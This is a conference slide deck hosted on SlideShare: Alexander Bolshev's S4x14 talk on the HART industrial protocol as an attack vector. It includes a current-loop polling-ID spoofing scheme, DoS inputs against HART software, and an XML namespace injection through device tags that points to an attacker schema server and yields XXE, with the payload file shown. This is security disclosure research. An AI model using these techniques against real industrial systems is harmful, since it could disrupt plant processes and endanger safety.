SlideShare une entreprise Scribd logo
1  sur  45
Télécharger pour lire hors ligne
Invest	
  in	
  security	
  
to	
  secure	
  investments	
  
HART	
  as	
  an	
  A)ack	
  Vector:	
  	
  
from	
  Current	
  Loop	
  to	
  Applica:on	
  Layer	
  
Alexander	
  Bolshev	
  	
  
Security	
  analyst	
  at	
  ERPScan	
  
S4x14	
  	
  
Digital	
  Bond	
  
 
	
  
Distributed	
  systems	
  
researcher,	
  Ph.D.	
  
Yet	
  another	
  man	
  in	
  
somecolorhat	
  
Alexander	
  Bolshev	
  
ERPScan	
  Inc.	
  
Leading	
  SAP	
  AG	
  partner	
  in	
  discovering	
  and	
  solving	
  security	
  
vulnerabili:es	
  	
  by	
  the	
  number	
  of	
  found	
  vulnerabili:es	
  
•  The	
  first	
  to	
  develop	
  so;ware	
  for	
  NetWeaver	
  J2EE	
  
assessment	
  
•  Developed	
  ERPScan	
  Security	
  Monitoring	
  Suite:	
  the	
  only	
  
soluHon	
  to	
  assess	
  all	
  areas	
  of	
  SAP	
  security	
  
•  Invited	
  to	
  talk	
  at	
  more	
  than	
  35	
  security	
  conferences	
  
worldwide:	
  BlackHat	
  (US/EU/DC/UAE),	
  RSA,	
  Defcon,	
  
CONFidence,	
  HITB,	
  etc.	
  
•  Research	
  team	
  with	
  experience	
  in	
  different	
  areas	
  of	
  
security:	
  from	
  ERP	
  and	
  web	
  security	
  to	
  mobile,	
  embedded	
  
devices,	
  and	
  criHcal	
  infrastructure,	
  accumulaHng	
  	
  their	
  
knowledge	
  in	
  SAP	
  research	
  
What	
  is	
  HART?	
  
•  Highway	
  Addressable	
  Remote	
  Transducer	
  Protocol	
  
•  Developed	
   by	
   Rosemount	
   in	
   mid-­‐1980s,	
   supported	
   by	
   Hart	
  
CommunicaHon	
  FoundaHon	
  (HCF)	
  
•  Different	
   physical	
   layers:	
   Current	
   Loop,	
   Wireless	
   (802.15.4),	
  
HART-­‐over-­‐IP,	
  RS-­‐485	
  
•  Mainly	
   used	
   for	
   communicaHng	
   between	
   soQware/PLC	
   and	
  
RTUs	
  (originally	
  transmi]ers)	
  
•  Mostly	
   used	
   in	
   hazardous	
   environments,	
   i.e.	
   power	
   plants,	
  
chemical	
  factories,	
  oil	
  &	
  gas	
  industry.	
  
•  Current	
   loop	
   line	
   length	
   can	
   reach	
   up	
   to	
   3km	
   =>	
   possible	
  
physical	
  security	
  problem	
  
•  Hart	
  protocol:	
  Simple.	
  Reliable.	
  Secure.	
  ©	
  HCF	
  
erpscan.com	
   4	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  devices	
  
•  RTUs	
  	
  
–  Transmi]ers	
  (temperature,	
  pressure,	
  etc.)	
  
–  I/O	
  devices	
  
•  PLC	
  modules	
  
•  Gateways	
  
•  Modems	
  
•  Communicators	
  
erpscan.com	
   5	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  soQware	
  
•  SCADA	
  and	
  HMI	
  
•  OPC	
  
•  PAS	
  (Plant	
  Assets	
  management	
  So;ware)	
  
•  MES	
  (and	
  even	
  ERP!)	
  integraHon	
  components	
  	
  
erpscan.com	
   6	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  vendors	
  
	
  	
  
erpscan.com	
   7	
  
And	
  much	
  more!	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Typical	
  HART	
  infrastructure	
  
	
  	
  
erpscan.com	
   8	
  
Current	
  Loop	
  
PAS	
  
MES	
  
RTUs	
  
SCADA/OPC	
  
PLCs
HART	
  
modem	
  
HART	
  
modem	
  
HART	
  
communicator	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  layers	
  
Physical	
  layers:	
  
–  FSK	
  (Copper	
  wiring,	
  4-­‐20mA	
  current	
  loop):	
  
•  point-­‐to-­‐point	
  mode	
  (analog/digital)	
  	
  
•  mulHdrop	
  mode	
  (digital)	
  	
  
–  Wireless	
  HART	
  (over	
  802.14.5)	
  
–  HART-­‐over-­‐IP	
  (TCP,	
  UDP)	
  
–  RS-­‐485	
  HART	
  gateways	
  	
  
	
  
erpscan.com	
   9	
  
OSI	
  Layer	
   HART	
  
7	
   ApplicaHon	
   Hart	
  commands	
  
2	
   Datalink	
   Binary,	
  Master/Slave	
  protocol	
  with	
  CRC	
  
1	
   Physical	
   FSK	
  via	
  Copper	
  wiring,	
  Wireless,	
  RS-­‐485,	
  HART-­‐IP	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  over	
  Current	
  Loop	
  (HART	
  FSK)	
  
	
  	
  
erpscan.com	
   10	
  
*picture	
  from	
  h]p://hartcomm.org	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  connec:on	
  
	
  	
  
erpscan.com	
   11	
  
+	
  
24V	
  
-­‐	
  
250Ohm	
  
RTUs	
  RTU	
  
External	
  Hardware	
  
HART	
  Communicator	
  
Source	
  wiring	
  	
  
(change	
  polarity	
  for	
  sink,	
  
	
  add	
  forth	
  wire	
  for	
  isolated)	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  packet	
  structure	
  
•  Every	
  packet	
  started	
  with	
  0xff…0xff	
  preamble	
  
•  Two	
  packet	
  types:	
  short	
  and	
  expanded	
  
•  Two	
  address	
  type:	
  polling	
  and	
  unique	
  
•  Three	
  frame	
  types:	
  
–  Burst	
  frame	
  (BACK,	
  1)	
  
–  Master	
  to	
  field	
  device	
  (STX,	
  2)	
  
–  Field	
  device	
  to	
  master	
  (ACK,	
  6)	
  
•  Check	
  byte:	
  XOR	
  of	
  all	
  bytes	
  
•  Three	
  types	
  of	
  commands:	
  Universal,	
  Common	
  PracHce	
  and	
  
Device	
  Families.	
  
	
  
erpscan.com	
   12	
  
Delimeter	
   Address	
   [Expand]	
   Command	
   Byte	
  Count	
   [Data]	
   Check	
  byte	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  commands	
  
HART	
  has	
  two	
  addressing	
  schemes:	
  
–  Polling	
  ID	
  (set	
  by	
  engineer,	
  used	
  for	
  geong	
  unique	
  ID)	
  
–  Unique	
  ID	
  (unique	
  per	
  RTU)	
  
HART	
  commands	
  divides	
  into	
  three	
  groups:	
  
•  Universal:	
  
–  OperaHons	
  with	
  id,	
  geong	
  main	
  variable,	
  tag	
  operaHons,	
  e.t.c.	
  
•  Common	
  pracHce:	
  
–  Engineering	
  and	
  process	
  specific	
  commands.	
  
•  Device	
  Families:	
  
–  Device	
  family	
  specific	
  commands.	
  
	
  erpscan.com	
   13	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Possible	
  risks	
  
If	
  a]acker	
  will	
  get	
  access	
  to	
  the	
  HART	
  channel,	
  he	
  could:	
  
•  Jam	
  the	
  channel	
  to	
  distract	
  normal	
  process.	
  
•  Reconfigure	
  RTUs	
  (change	
  the	
  variables	
  limits,	
  alarm	
  
ranges,	
  e.t.c.),	
  even	
  reflash	
  and	
  write	
  to	
  EEPROM.	
  
•  Spoof	
  some	
  RTUs	
  variable	
  data	
  (we’ll	
  talk	
  later	
  about	
  
how	
  to	
  do	
  this).	
  
•  Exploit	
  vulnerabili?es	
  in	
  HART	
  soBware.	
  
•  ACack	
  systems	
  that	
  uses	
  data	
  from	
  HART	
  soBware.	
  
	
  
	
  
erpscan.com	
   14	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
But…	
  
	
  	
  
erpscan.com	
   15	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
…you	
  can’t	
  just	
  simply	
  spoof	
  the	
  HART	
  packet.	
  
Spoof	
  is	
  impossible	
  in	
  HART	
  FSK?	
  
•  The	
  following	
  a]acks	
  are	
  possible	
  only	
  if	
  a]acker	
  can	
  force	
  
HART	
  master	
  to	
  connect	
  to	
  his	
  forged	
  HART	
  device	
  instead	
  of	
  
real	
  device.	
  	
  
•  But	
  HART	
  protocol	
  FSK	
  physical	
  layer	
  based	
  on	
  FSK,	
  half-­‐duplex	
  
and	
  master-­‐slave	
  scheme,	
  so	
  we	
  can’t	
  simply	
  spoof	
  HART	
  
packet,	
  because	
  if	
  we	
  both	
  answer	
  on	
  master	
  packet,	
  collision	
  
will	
  occur.	
  
•  HART	
  is	
  secured	
  against	
  such	
  a)acks	
  according	
  to	
  vendors.	
  
So,	
  spoofing	
  a)acks	
  impossible	
  in	
  HART?	
  
	
  
That’s	
  false.	
  We	
  can’t	
  simply	
  spoof,	
  but	
  we	
  can	
  	
  
change	
  RTU	
  polling	
  ID.	
  
erpscan.com	
   16	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   17	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Current	
  loop	
  
Master	
   Slave	
  
(1)	
  Normal	
  process:	
  master	
  speaks	
  with	
  slave	
  
Command	
  with	
  address	
  -­‐>	
  
E0BD010303	
  
<-­‐	
  Reply	
  
PollID:	
  1	
  
UniqueID:	
  E0BD010303	
  	
  
Sniffing	
  traffic	
  
A]acker	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   18	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Current	
  loop	
  
Master	
   Slave	
  
(2)	
  A]acker	
  JAMs	
  the	
  line	
  
PollID:	
  1	
  
UniqueID:	
  E0BD010303	
  	
  
A]acker	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   19	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Current	
  loop	
  
Master	
   Slave	
  
(3)	
  Immediately	
  a;er	
  that	
  sends	
  command	
  6	
  to	
  RTU	
  	
  
Change	
  your	
  polling	
  id	
  to	
  9	
  -­‐>	
  <-­‐	
  Reply	
  
PollID:	
  9	
  
UniqueID:	
  E0BD010303	
  	
  
A]acker	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   20	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Current	
  loop	
  
Master	
   Slave	
  
(4)	
  Master	
  asks:	
  who	
  has	
  polling	
  ID	
  equal	
  to	
  1?	
  
Command	
  0	
  for	
  	
  
polling	
  id	
  1	
  -­‐>	
   <-­‐	
  Reply	
  
PollID:	
  9	
  
UniqueID:	
  E0BD010303	
  	
  
PollID:	
  1	
  
UniqueID:	
  E0BD010304	
  	
  
A]acker	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   21	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Current	
  loop	
  
Master	
   Slave	
  
(5)	
  Now	
  master	
  speaks	
  to	
  a]acker,	
  not	
  to	
  RTU	
  
Command	
  with	
  address	
  
E0BD010304	
  -­‐>	
  
<-­‐	
  Reply	
  
PollID:	
  9	
  
UniqueID:	
  E0BD010303	
  	
  
PollID:	
  1	
  
UniqueID:	
  E0BD010304	
  	
  
A]acker	
  
Example:	
  INOR	
  MePro	
  
•  An	
  example:	
  INOR	
  MePro	
  2.12.01	
  
•  HART	
   transmi]ers	
   setup,	
   calibraHon,	
   and	
   diagnosHcs	
  
so;ware	
  
•  Denial	
  of	
  Service	
  vulnerability:	
  	
  
	
  
HART	
  command	
  0	
  replies	
  with	
  0	
  in	
  length	
  and	
  >250	
  ‘A’	
  
(smashing	
  maximum	
  packet	
  length)	
  
	
  
erpscan.com	
   22	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
INOR	
  MePro	
  2.12.01	
  DoS	
  
	
  	
  
erpscan.com	
   23	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
A)acks	
  on	
  the	
  upper	
  levels:	
  PAS	
  
•  Plant	
  Assets	
  management	
  So;ware	
  provides	
  tools	
  for	
  managing	
  
plants	
  assets,	
  integrates	
  with	
  MES	
  &&	
  ERP	
  
•  There	
  are	
  PAS	
  soluHons	
  for	
  managing	
  RTUs	
  and	
  PLCs	
  
•  Most	
  popular	
  soluHons:	
  FieldCare	
  and	
  PACTWare	
  
•  Most	
  of	
  the	
  soluHons	
  are	
  based	
  on	
  FDT/DTM	
  standard	
  
•  FDT	
  standardizes	
  the	
  communicaHon	
  and	
  configuraHon	
  
interface	
  between	
  all	
  field	
  devices	
  and	
  host	
  systems	
  
•  DTM	
  provides	
  a	
  unified	
  structure	
  for	
  accessing	
  device	
  
parameters,	
  configuring	
  and	
  operaHng	
  the	
  devices,	
  and	
  
diagnosing	
  problems	
  
•  DTMs	
  can	
  be	
  also	
  used	
  for	
  OPC	
  &&	
  SCADA	
  
erpscan.com	
   24	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
erpscan.com	
   25	
  
	
  	
  
Current	
  Loop	
  
Transmi]ers	
  &&	
  I/O	
  HART	
  
modem	
  
CommDTM	
  
DeviceDTM	
  
Frame	
  ApplicaHon	
  
COM	
  Container	
  
COM	
  Components	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
What	
  is	
  FDT/DTM?	
  
Example	
  frame	
  applica:on:	
  FieldCare	
  
erpscan.com	
   26	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
FDT/DTM	
  architecture	
  
erpscan.com	
   27	
  
*diagram	
  from	
  the	
  official	
  FDT/DTM	
  specificaHon	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
XML:	
  worth	
  a	
  try	
  
What	
  will	
  happen	
  if	
  the	
  a]acker	
  inserts	
  some	
  bad	
  XML	
  
symbols	
  in	
  the	
  device	
  tag?	
  
erpscan.com	
   28	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Is	
  it	
  usable?	
  
•  Unfortunately,	
  HART	
  device	
  tag	
  cannot	
  exceed	
  8	
  bytes	
  
(6	
  packed	
  ASCII)	
  and	
  should	
  only	
  be	
  in	
  upper-­‐case	
  
•  Fortunately,	
  HART	
  long	
  device	
  tag	
  can	
  be	
  up	
  to	
  32	
  
ASCII	
  characters	
  
•  Thus,	
  a	
  DTM	
  component	
  that	
  using	
  it	
  for	
  device	
  
idenHficaHon	
  may	
  be	
  vulnerable	
  
And	
  we	
  found	
  such	
  a	
  component	
  made	
  by	
  a	
  VERY	
  BIG	
  
vendor!	
  
erpscan.com	
   29	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
XML	
  NS	
  injec:on	
  
•  We	
  have	
  only	
  32	
  bytes	
  for	
  XML	
  injecHon	
  and	
  cannot	
  
access	
  the	
  beginning	
  of	
  document	
  
•  So	
  XML	
  NS	
  injecHon	
  was	
  used	
  to	
  include	
  external	
  XDR	
  
schema:	
  
" xmlns="x-schema:http://pc
erpscan.com	
   30	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Injec:ng	
  link	
  into	
  external	
  XDR	
  schema	
  
	
  
erpscan.com	
   31	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
XDR	
  schema	
  injec:on	
  →	
  XXE	
  
•  It	
  works.	
  Now	
  we	
  can	
  start	
  the	
  web	
  server	
  that	
  returns	
  the	
  
specially	
  cra;ed	
  XML	
  schema,	
  which	
  will	
  provide	
  an	
  XXE:	
  
	
  
C:Tools>type index.html
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE Ent [
<!ELEMENT Ent ANY>
<!ENTITY xxe SYSTEM "http://127.0.0.1:81/">
]>
<Ent>&xxe;</Ent>
C:Tools>python simplehttp.py
Serving HTTP on 0.0.0.0 port 80 ...
erpscan.com	
   32	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Working	
  XML	
  eXternal	
  En:ty	
  
	
  
erpscan.com	
   33	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
A)ack	
  scheme	
  
	
  	
  
erpscan.com	
   34	
  
Current	
  loop	
  
PAS	
  
PAS	
  Web	
  (e.g.	
  condiHon	
  monitoring)/MES	
  
XML	
  data	
  
Long	
  tag	
  change	
  packet	
  
"	
  xmlns=“x-­‐schema:h]p://q123.ru	
  	
  
A]acker	
  
HART	
  transmi]er	
  
XMLI	
  
Evil	
  web	
  
server	
  
Request	
  for	
  remote	
  XDR	
  schema	
  
Reply	
  with	
  XXE	
  
XXE	
  
1	
   2	
  
3	
  
4	
  
5	
  
Internet
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Note!	
  
•  FieldCare	
  has	
  decent	
  architecture,	
  but	
  it	
  isn't	
  vulnerable	
  in	
  this	
  
way:	
  the	
  vulnerability	
  persists	
  only	
  in	
  the	
  component	
  
erpscan.com	
   35	
  
Another	
  component	
  	
  
reac:on	
  to	
  external	
  en:ty	
  
But	
  you	
  have	
  thousands	
  of	
  DMTs	
  to	
  check	
  
	
  this	
  a)ack	
  against	
  them!	
  
ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Possible	
  risks	
  &&	
  consequences	
  
XXE	
  allows	
  a]ackers	
  to	
  do	
  evil	
  things,	
  such	
  as:	
  
•  Reading	
  files	
  
•  NTLM	
  relay	
  a]acks	
  
•  SSRF	
  (server	
  side	
  request	
  forgery)	
  a]acks	
  
•  XML	
  parser	
  DoS	
  (memory	
  consumpHon,	
  etc.)	
  
Moreover,	
  as	
  you	
  can	
  see	
  on	
  slides,	
  the	
  vulnerable	
  
component	
  uses	
  Internet	
  Explorer	
  to	
  resolve	
  external	
  
XML	
  inclusions,	
  and	
  it	
  can	
  also	
  be	
  used	
  by	
  the	
  a]acker	
  if	
  
the	
  IE	
  version	
  is	
  old	
  and	
  unpatched	
  (possible	
  RCE	
  and	
  
other	
  things)	
  
erpscan.com	
   36	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  over	
  IP	
  
•  HART	
  can	
  work	
  over	
  TCP	
  or	
  over	
  UDP	
  (port	
  5094	
  or	
  
20004/20003)	
  
•  No	
  authen:ca:on	
  required	
  at	
  all!	
  
•  First,	
  client	
  (e.g.	
  OPC)	
  and	
  server	
  (e.g.	
  transmi]er)	
  establish	
  
communicaHon,	
  then	
  HART	
  commands	
  and	
  answers	
  can	
  be	
  
directly	
  sent	
  in	
  packets	
  with	
  a	
  HART-­‐IP	
  header	
  
erpscan.com	
   37	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HART	
  OPC	
  Server	
  
	
  	
  
erpscan.com	
   38	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Another	
  DoS	
  
	
  Cra;	
  a	
  packet	
  with	
  a	
  bad	
  HART-­‐IP	
  header:	
  	
  
hartip = 'x41x01x00x00x00x02'
+ 'x0000'
	
  
erpscan.com	
   39	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Tools	
  developed	
  
•  HRTShield	
  –	
  a	
  high-­‐power	
  low-­‐noise	
  HART	
  modem	
  
Arduino	
  shield	
  for	
  sniffing,	
  injecHng,	
  and	
  jamming	
  
current	
  loop	
  
•  Python	
  HART	
  protocol	
  library	
  and	
  some	
  scripts	
  for	
  
HRTShield	
  (JAM,	
  change	
  long	
  tag,	
  and	
  others…)	
  
•  Metasploit	
  auxiliary	
  modules	
  for	
  scanning	
  HART-­‐IP	
  
ports	
  in	
  networks	
  and	
  run	
  basic	
  HART	
  commands,	
  such	
  
as	
  device	
  idenHficaHon,	
  reading	
  and	
  changing	
  
parameters,	
  working	
  with	
  tags	
  
erpscan.com	
   40	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
HRTShield	
  
erpscan.com	
   41	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Conclusion	
  
• 	
  HART	
  isn’t	
  as	
  secure	
  as	
  they	
  have	
  been	
  telling	
  you.	
  
Sniffing	
  and	
  injecHng	
  in	
  current	
  loop	
  is	
  possible	
  
• 	
  Every	
  skilled	
  electric	
  engineer/hardware	
  hacker	
  can	
  
create	
  HART	
  devices	
  easily	
  
• 	
  Thus,	
  physical	
  security	
  is	
  the	
  ToDo	
  item	
  No.1	
  when	
  you	
  
are	
  planning	
  HART	
  infrastructure	
  
• 	
  HART-­‐IP	
  protocol	
  needs	
  deep	
  redesign	
  to	
  make	
  it	
  more	
  
secure	
  and	
  reliable	
  
erpscan.com	
   42	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Links	
  
• 	
  HART	
  Shield	
  Circuit	
  and	
  PCB	
  (Eagle):	
  
h]ps://github.com/Darkkey/hrtshield	
  
• 	
  Python	
  scripts	
  and	
  sketches	
  for	
  *duino:	
  	
  
h]ps://github.com/Darkkey/harHnsecurity	
  
• 	
  Metasploit	
  modules:	
  
h]ps://github.com/Darkkey/hartmeta	
  
erpscan.com	
   43	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Thanksgiving	
  service	
  
• 	
  Alexander	
  Malinovskiy	
  (Weedle)	
  for	
  great	
  help	
  with	
  HART	
  
physical	
  layer	
  research	
  and	
  making	
  HRTShield	
  
• 	
  Alexander	
  Polyakov	
  (sh2kerr)	
  for	
  making	
  this	
  research	
  possible	
  
• 	
  Fedor	
  Savelyev	
  and	
  Grigoriy	
  Savelyev	
  for	
  consultaHons	
  on	
  
graduaHng	
  amplifiers	
  
• 	
  Svetlana	
  Cherkasova	
  for	
  some	
  binary	
  magic	
  
• 	
  KonstanHn	
  Karpov	
  (QweR)	
  for	
  helping	
  with	
  delivering	
  HART	
  
devices	
  
• 	
  Maxim	
  Integrated	
  for	
  great	
  ICs	
  and	
  support	
  
• 	
  The	
  electronics.stackexchange.com	
  guys	
  for	
  answering	
  many	
  
stupid	
  quesHons	
  
	
  
erpscan.com	
   44	
  ERPScan	
  —	
  invest	
  in	
  security	
  to	
  secure	
  investments	
  
Web:	
  	
  www.erpscan.com	
  
e-­‐mail:	
  	
  
info@erpscan.com	
  
abolshev@erpscan.com	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  
Twi]er:	
  	
  
@erpscan	
  
@dark_k3y	
  
Thank	
  you	
  for	
  listening!	
  
Any	
  Q?	
  

Contenu connexe

Tendances

Cisco Live! :: Introduction to IOS XR for Enterprises and Service Providers
Cisco Live! :: Introduction to IOS XR for Enterprises and Service ProvidersCisco Live! :: Introduction to IOS XR for Enterprises and Service Providers
Cisco Live! :: Introduction to IOS XR for Enterprises and Service ProvidersBruno Teixeira
 
MikroTik MTCNA
MikroTik MTCNAMikroTik MTCNA
MikroTik MTCNAAli Layth
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku
 
Barry Hesk: Cisco Unified Communications Manager training deck 1
Barry Hesk: Cisco Unified Communications Manager training deck 1Barry Hesk: Cisco Unified Communications Manager training deck 1
Barry Hesk: Cisco Unified Communications Manager training deck 1Barry Hesk
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPERPScan
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Introduction to networks CCNAv7 Module-1
Introduction to networks CCNAv7 Module-1Introduction to networks CCNAv7 Module-1
Introduction to networks CCNAv7 Module-1Mukesh Chinta
 
Access control list 2
Access control list 2Access control list 2
Access control list 2Kishore Kumar
 
CCNA R&S-13-Spanning Tree Protocol Implementation
CCNA R&S-13-Spanning Tree Protocol ImplementationCCNA R&S-13-Spanning Tree Protocol Implementation
CCNA R&S-13-Spanning Tree Protocol ImplementationAmir Jafari
 
Ccnp workbook network bulls
Ccnp workbook network bullsCcnp workbook network bulls
Ccnp workbook network bullsSwapnil Kapate
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Canada
 
Cisco Router Basic Configuration
Cisco Router Basic ConfigurationCisco Router Basic Configuration
Cisco Router Basic ConfigurationProf. Erwin Globio
 
Cisco Identity Services Engine (ISE)
Cisco Identity Services Engine (ISE)Cisco Identity Services Engine (ISE)
Cisco Identity Services Engine (ISE)Anwesh Dixit
 
SIPREC RTPEngine Media Forking
SIPREC RTPEngine Media ForkingSIPREC RTPEngine Media Forking
SIPREC RTPEngine Media ForkingHossein Yavari
 
CCNAv5 - S1: Chapter 2 - Configuring a network operating system
CCNAv5 - S1: Chapter 2 - Configuring a network operating systemCCNAv5 - S1: Chapter 2 - Configuring a network operating system
CCNAv5 - S1: Chapter 2 - Configuring a network operating systemVuz Dở Hơi
 
Chapter12 -- troubleshooting networking problems
Chapter12  -- troubleshooting networking problemsChapter12  -- troubleshooting networking problems
Chapter12 -- troubleshooting networking problemsRaja Waseem Akhtar
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 

Tendances (20)

C C N A Day2
C C N A  Day2C C N A  Day2
C C N A Day2
 
Cisco Live! :: Introduction to IOS XR for Enterprises and Service Providers
Cisco Live! :: Introduction to IOS XR for Enterprises and Service ProvidersCisco Live! :: Introduction to IOS XR for Enterprises and Service Providers
Cisco Live! :: Introduction to IOS XR for Enterprises and Service Providers
 
MikroTik MTCNA
MikroTik MTCNAMikroTik MTCNA
MikroTik MTCNA
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons Learned
 
Barry Hesk: Cisco Unified Communications Manager training deck 1
Barry Hesk: Cisco Unified Communications Manager training deck 1Barry Hesk: Cisco Unified Communications Manager training deck 1
Barry Hesk: Cisco Unified Communications Manager training deck 1
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAP
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVE
 
Introduction to networks CCNAv7 Module-1
Introduction to networks CCNAv7 Module-1Introduction to networks CCNAv7 Module-1
Introduction to networks CCNAv7 Module-1
 
Ipsec vpn v0.1
Ipsec vpn v0.1Ipsec vpn v0.1
Ipsec vpn v0.1
 
Access control list 2
Access control list 2Access control list 2
Access control list 2
 
CCNA R&S-13-Spanning Tree Protocol Implementation
CCNA R&S-13-Spanning Tree Protocol ImplementationCCNA R&S-13-Spanning Tree Protocol Implementation
CCNA R&S-13-Spanning Tree Protocol Implementation
 
Ccnp workbook network bulls
Ccnp workbook network bullsCcnp workbook network bulls
Ccnp workbook network bulls
 
Stun turn poc_pilot
Stun turn poc_pilotStun turn poc_pilot
Stun turn poc_pilot
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
 
Cisco Router Basic Configuration
Cisco Router Basic ConfigurationCisco Router Basic Configuration
Cisco Router Basic Configuration
 
Cisco Identity Services Engine (ISE)
Cisco Identity Services Engine (ISE)Cisco Identity Services Engine (ISE)
Cisco Identity Services Engine (ISE)
 
SIPREC RTPEngine Media Forking
SIPREC RTPEngine Media ForkingSIPREC RTPEngine Media Forking
SIPREC RTPEngine Media Forking
 
CCNAv5 - S1: Chapter 2 - Configuring a network operating system
CCNAv5 - S1: Chapter 2 - Configuring a network operating systemCCNAv5 - S1: Chapter 2 - Configuring a network operating system
CCNAv5 - S1: Chapter 2 - Configuring a network operating system
 
Chapter12 -- troubleshooting networking problems
Chapter12  -- troubleshooting networking problemsChapter12  -- troubleshooting networking problems
Chapter12 -- troubleshooting networking problems
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 

En vedette

PLC Code Protection
PLC Code ProtectionPLC Code Protection
PLC Code ProtectionDigital Bond
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
Malware's Most Wanted: CryptoLocker—The Ransomware Trojan
Malware's Most Wanted: CryptoLocker—The Ransomware TrojanMalware's Most Wanted: CryptoLocker—The Ransomware Trojan
Malware's Most Wanted: CryptoLocker—The Ransomware TrojanCyphort
 
Enterprise security: ransomware in enterprise and corporate entities
Enterprise security: ransomware in enterprise and corporate entitiesEnterprise security: ransomware in enterprise and corporate entities
Enterprise security: ransomware in enterprise and corporate entitiesQuick Heal Technologies Ltd.
 
Trojan virus & backdoors
Trojan virus & backdoorsTrojan virus & backdoors
Trojan virus & backdoorsShrey Vyas
 
